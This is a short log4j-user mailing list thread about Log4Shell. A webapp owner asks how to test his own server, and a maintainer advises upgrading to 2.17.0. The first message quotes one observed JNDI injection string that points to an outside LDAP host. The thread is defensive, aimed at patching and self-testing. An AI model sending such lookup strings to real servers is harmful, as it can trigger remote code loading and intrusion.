Hi Gary
In the case of one webapp I was able to upgrade quickly to 2.17.0 and
everything seems to be fine :-)
Thanks for the hint, searching for "log4j shell poc" helps, so let's see
whether we can attack ourselves :-)
Thanks
Michael
Am 18.12.21 um 14:36 schrieb Gary Gregory:
Michael,
First, please make sure you are using our latest and greatest, currently 2.17.0.
https://logging.apache.org/log4j/2.x/download.html
I don't want to spread the FUD here, but if you search the web for
"Log4Shell", you should find POCs.
TY!
Gary
On Sat, Dec 18, 2021 at 7:57 AM Michael Wechner
<michael.wech...@wyona.com> wrote:
Hi
I have a webapp running using log4j and I can see various requests
containing jndi, e.g.
http://HOSTNAME/$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D
whereas it is not clear to me whether the attack was successful.
Does anyone know how I could attack my own server in order to test
whether my server might be vulnerable?
Thanks
Michael
---------------------------------------------------------------------
To unsubscribe, e-mail: log4j-user-unsubscr...@logging.apache.org
For additional commands, e-mail: log4j-user-h...@logging.apache.org
---------------------------------------------------------------------
To unsubscribe, e-mail: log4j-user-unsubscr...@logging.apache.org
For additional commands, e-mail: log4j-user-h...@logging.apache.org
---------------------------------------------------------------------
To unsubscribe, e-mail: log4j-user-unsubscr...@logging.apache.org
For additional commands, e-mail: log4j-user-h...@logging.apache.org
